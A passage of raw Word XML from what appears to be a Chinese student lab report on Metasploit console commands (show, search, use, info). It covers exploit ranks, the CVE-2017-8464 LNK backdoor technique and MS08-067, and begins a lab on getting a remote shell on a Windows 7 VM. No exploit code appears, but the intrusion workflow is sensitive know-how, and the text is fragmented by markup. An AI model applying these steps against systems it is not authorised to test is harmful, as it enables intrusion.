              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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通过 help 查看帮助，可以对 msf 有个整体认识，可以看到 msf 相关命令可以分成以下类型：</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Core Commands #核心命令</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Module Commands #模块命令</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Job Commands #后台任务命令</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Resource Script Commands #资源脚本命令</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Database Backend Commands #数据库后端命令</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Credentials Backend Commands #证书/凭证后端命令</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szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Developer Commands #开发人员命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4、实验结果分析</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80" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1.connect 命令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connect 命令主要用于远程连接主机。一般用于内网渗透。比较常用的命令就是connect 192.168.1.1（目标ip地址）</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987415" cy="3515360"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1524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32"/>
                    <a:srcRect r="254" b="5754"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5987415" cy="35153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我们成功连接到服务器时，可以提交一个get请求，获取服务器的版本号</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341745" cy="2375535"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1206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33"/>
                    <a:srcRect r="409" b="4102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6341745" cy="2375535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2.模块相关命令的show使用方法</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show 命令用的很多。</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“show”命令的有效参数是：all, encoders, nops, exploits, payloads, auxiliary, post,plugins, info, options</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列出 metasploit 框架中的所有渗透攻击模块 exploits</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命令行出现的数据较多所以比较耗费时间</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67985" cy="4118610"/>
            <wp:effectExtent l="0" t="0" r="18415" b="2159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34"/>
                    <a:srcRect r="454" b="3988"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5467985" cy="41186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列出 metasploit 框架中的所有攻击载荷</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pPr>
      <w:r>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6406515" cy="4835525"/>
            <wp:effectExtent l="0" t="0" r="19685" b="15875"/>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35"/>
                    <a:srcRect r="59" b="3400"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6406515" cy="48355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列出 metasploit 框架中的所有辅助攻击载荷</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059680" cy="3818255"/>
            <wp:effectExtent l="0" t="0" r="20320" b="17145"/>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36"/>
                    <a:srcRect r="60" b="3418"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5059680" cy="381825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160" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4F4F4F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>3模块相关的命令 search 搜索的使用方法</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当你使用 msfconsole 的时候，你会用到各种漏洞模块、各种插件等等。所以 search 搜索命令就很重要</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输入 search –h 会列出 search 命令的一些选项</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022340" cy="2962910"/>
            <wp:effectExtent l="0" t="0" r="22860" b="889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7"/>
                    <a:srcRect r="587" b="6230"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6022340" cy="29629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例如要找mysql相关的漏洞</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859780" cy="2806065"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1333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38"/>
                    <a:srcRect r="349" b="6428"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5859780" cy="280606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当你想要找指定的漏洞名字的时候非常方便</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841240" cy="1845945"/>
            <wp:effectExtent l="0" t="0" r="10160" b="825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9"/>
                    <a:srcRect r="223" b="7083"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4841240" cy="18459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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>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查询名字中带有mysql的漏洞</w:t>
      </w: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788660" cy="1906905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="23495"/>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40"/>
                    <a:srcRect r="437" b="4998"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5788660" cy="190690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 Name Disclosure Date Rank Check Description</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编号 名称 披露日期 排名 检查 说明</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每一个漏洞利用模块基于它们对目标系统的潜在影响都被标记了一个 Rank 字段。</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用户可以基于 Rank 对漏洞利用模块进行搜索，分类以及排序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Rank 按照可靠性降序排列：</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1.excellent 漏洞利用程序绝对不会使目标服务崩溃，就像 SQL 注入、命令执行、远程文件包含、本地文件包含等等。除非有特殊情况，典型的内存破坏利用程序不可以被评估为该级别。</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2.great 该漏洞利用程序有一个默认的目标系统，并且可以自动检测适当的目标系统，或者在目标服务的版本检查之后可以返回到一个特定的返回地址。</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3.good 该漏洞利用程序有一个默认目标系统，并且是这种类型软件的“常见情况”（桌面应用程序的Windows 7，服务器的 2012 等）</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4.normal 该漏洞利用程序是可靠的，但是依赖于特定的版本，并且不能或者不能可靠地自动检测。</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5.average 该漏洞利用程序不可靠或者难以利用。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6.low 对于通用的平台而言，该漏洞利用程序几乎不能利用（或者低于 50% 的利用成功率）</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7.manual 该漏洞利用程序不稳定或者难以利用并且基于拒绝服务（DOS）。如果一个模块只有在用户特别配置该模块的时候才会被用到，否则该模块不会被使用到，那么也可以评为该等级。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通过路径进行查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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有时候，我们只记得模块的路径，但是却忘记了模块的名称。那么就可以用 path：命令查找在该路径下的所有模块。如果我要 mysql 路径下的所有 mysql 利用模块，那么就输入</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73040" cy="3977005"/>
            <wp:effectExtent l="0" t="0" r="10160" b="10795"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect r="360" b="3765"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5273040" cy="397700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缩小查询范围</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关键字：platform</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 xml:space="preserve">作用：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Modules affecting this platform 即：列出可以影响此平台的模块，也就是比较好的漏洞有时候我们会搜索到大量的模块，那么可以用 platform：命令来缩小查询范围。使用 platform 命令后，所查询的结果会列出 rank 比较高的模块。如果我要查找 mysql 的漏洞，那么输入</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通过类型进行查找</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这里要使用到 type：命令。</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type : 特定类型的模块(exploit, payload, auxiliary, encoder, evasion, post, or nop)</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要搜索 exploit 模块，那么就输search type:exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4D4D4D"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>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787900" cy="3631565"/>
            <wp:effectExtent l="0" t="0" r="12700" b="635"/>
            <wp:docPr id="7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IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect r="256" b="3131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4787900" cy="3631565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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529580" cy="2661285"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect r="366" b="5245"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5529580" cy="266128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联合查找</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大家可以使用上面的参数自行搭配使用。如果我要查找 mysql 的 exploit 相关漏洞。那么输入</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54015" cy="4135755"/>
            <wp:effectExtent l="0" t="0" r="6985" b="4445"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect r="660" b="3534"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5454015" cy="413575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MySQL yaSSL CertDecoder::GetName Buffer Overflow 的意思是：</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mysql yassl certdecoder:：getname 缓冲区溢出漏洞</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根据 CVE 搜索 exploit 相关模块</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CVE 概述：CVE 的英文全称是“Common Vulnerabilities &amp; Exposures”公共漏洞和暴露。</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CVE 就好像是一个字典表，为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。</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使用一个共同的名字，可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据，虽然这些工具很难整合在一起。这样就使得 CVE 成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞，如果有 CVE 名称，你就可以快速地在任何其它 CVE 兼容的数据库中找到相应修补的信息，解决安全问题</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2017 年 GitHub 上公开了 CVE-2017-8464 漏洞的 metasploit-framework 利用模块。利用此模块在Windows 10 x64 (Build 14393)版本上测试有效</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下载链接：</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https://github.com/ykoster/metasploit-framework/blob/b669b9fb81efdec4f59177116ee9524d71527d37/documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md</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现在此模块已经加入 metasploit 中了。</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通过执行 cve_2017_8464_lnk_rce.rb 模块，将生成大量的.lnk 文件（对应盘符从 D 到 Z）和要加载的.dll 文件（后门文件）。将所有样本文件拷到 U 盘里，然后将 U 盘插到 Windows7 机器上，默认自动执行</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查找：CVE-2017-8464 远程命令执行漏洞</w:t>
      </w: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801995" cy="4415790"/>
            <wp:effectExtent l="0" t="0" r="14605" b="3810"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect r="468" b="2999"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5801995" cy="441579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4.模块相关命令use的使用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use 使用参数。如你要使用到某个模块，就要使用到 use 命令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语法：use 模块的名字</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实战背景：</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2008 年微软爆出 ms08_067 漏洞，如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击</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先查找出自己想要的 ms08_067 漏洞模块</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536565" cy="1927225"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect r="-184" b="8518"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5536565" cy="19272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装载一个渗透攻击模块</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900295" cy="463550"/>
            <wp:effectExtent l="0" t="0" r="1905" b="19050"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="4900295" cy="4635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退出当前调用的模块</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296025" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="3175" b="22225"/>
            <wp:docPr id="7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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6296025" cy="5619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5.模块相关的命令info使用方法</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info ：显示模块的相关信息。</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方法 1：info 模块名称</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126480" cy="3145155"/>
            <wp:effectExtent l="0" t="0" r="20320" b="4445"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:srcRect r="124" b="5765"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126480" cy="314515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方法 2：use 装载模块后直接使用 info</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385435" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="24765" b="15875"/>
            <wp:docPr id="8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56"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:srcRect r="259" b="5440"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5385435" cy="305752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从弹出的消息中，需要重点关注的内容是：</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可用目标，就是查看可以攻击哪些操作系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>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960110" cy="5121275"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:srcRect r="32" b="3782"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="512127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Basic options: 调用漏洞需要的相关参数</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5608955" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="4445" b="20320"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5608955" cy="7162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漏洞描述和执行过程</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869305" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="23495" b="9525"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:srcRect r="207" b="9941"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5869305" cy="15144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参考文档</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60975" cy="834390"/>
            <wp:effectExtent l="0" t="0" r="22225" b="3810"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5260975" cy="83439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使用 show 命令查看模块的相关信息</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536565" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:srcRect r="-80" b="5881"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5536565" cy="30384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查看可以攻击哪些系统</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317490" cy="3081655"/>
            <wp:effectExtent l="0" t="0" r="16510" b="17145"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect r="84" b="4600"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5317490" cy="308165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4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令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通过 msf 模块获取 Win7 主机远程 shell</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Win7 旗舰版 SP1-64 位系统镜像（内有激活工具）：</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链接：https://pan.baidu.com/s/1FueCa5Z9WUBbOWvL-Djwqw</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提取码：root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Win7 旗舰版 SP1-64 位免安装版（已激活）密码：123456，下载解压后用 VMware 直接打开即可</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链接：https://pan.baidu.com/s/1ISsGGZ-S0XR06w98dHZf1g</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提取码：0khh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
